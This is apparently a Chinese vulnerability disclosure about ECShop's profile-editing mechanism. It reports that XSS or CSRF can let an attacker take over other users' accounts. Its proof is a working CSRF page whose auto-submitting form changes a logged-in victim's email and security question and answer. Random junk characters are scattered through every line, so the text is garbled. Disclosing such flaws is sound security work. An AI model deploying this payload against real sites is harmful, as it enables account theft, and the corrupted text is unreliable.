简要描述:
1 u; E0 H& _, R3 h; recshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
3 R9 r: Z+ m6 Z M, D/ z7 M" e9 D3 f* ~. ?7 w" w
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
0 M1 q( C& H% k% ?/ M4 p! }/ A
v$ D; X! T! G详细说明:
- i% `0 I' ]1 L" b- Q利用csrf和xss可以突破官方所说的“障碍”/ T, r, U7 R6 P$ Q. G5 i
xss版本已经有人说明+ `, g- C0 o* u/ u5 [6 V
这里给出csrf版本* j' c, R7 n. C1 k% K0 V* K
* Y* k$ `1 C4 [: O: C w( a2 h1 K* B
漏洞证明:
) L( k8 b- j8 H( p2 b# k<html>; D& E, _" p1 P8 g" K: a7 q
<body>
# _$ Z, m$ A9 k- g: M+ I' x<form action="http://www.wooyun.org/ecshop/user.php" method="POST">2 \1 O" S: B9 S6 Z9 \5 v& E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">- S3 _7 a6 ^) B s% h
<INPUT TYPE="text" NAME="act" value="act_edit_profile">, T+ d* |& }' U9 N2 e- V' D' D2 x
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
5 R2 g9 M" l3 p* V& f# d( ~, l<INPUT TYPE="text" NAME="passwd_answer" value="exploit">5 ~7 x! X4 |- w- ?
</body>
7 Z3 V# i" d( p }% }* B+ t6 ? {<script>
3 S8 r0 ~9 @: L2 w8 h( X+ T% O1 @document.forms[0].submit();+ D6 g$ ~% q* ^
</script>
: ^, Z; S' }; {. M6 m9 S6 E) _* s</html>
* d+ A* y& u9 R' ?5 }7 ^构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失# B2 k/ l" O0 u u Y5 h+ U, Q
, v3 V) v6 n% M* s
|